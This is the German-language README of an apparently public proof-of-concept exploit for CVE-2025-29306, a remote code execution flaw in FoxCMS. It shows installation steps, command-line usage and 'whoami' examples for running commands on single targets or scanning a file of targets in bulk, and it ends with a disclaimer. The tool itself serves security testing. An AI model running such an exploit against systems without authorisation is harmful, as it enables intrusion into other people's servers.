
Proof-of-Concept (PoC) für CVE-2025-29306, eine Remote Code Execution-Schwachstelle in FoxCMS. Dieses Python-Skript scannt einzelne oder mehrere Ziele, führt Befehle aus und meldet anfällige Hosts.
Ein Python-Exploit für CVE-2025-29306, eine Sicherheitslücke zur Remote-Code-Ausführung in FoxCMS. Dieses Tool ermöglicht das Testen einzelner Ziele oder das Scannen mehrerer Hosts im Bulk-Modus.
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
requestsbeautifulsoup4argparsePakete installieren mit:
pip install requests beautifulsoup4
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Command to execute on vulnerable hosts
-t TARGET, --target TARGET
Single target in the format ip:port
-f TARGETS_FILE, --targets-file TARGETS_FILE
File containing multiple targets, one per line, in the format ip:port
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
Die Textdatei mit den Zielen sollte pro Zeile ein Ziel im Format enthalten:
ip:port
Beispiel:
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
Das Skript liefert:
foxcms_rce_results.txt
Dieses Tool dient ausschließlich zu Bildungs- und Autorisierungstestzwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder durch dieses Programm verursachte Schäden.
MIT-Lizenz – Siehe Datei LICENSE für Details.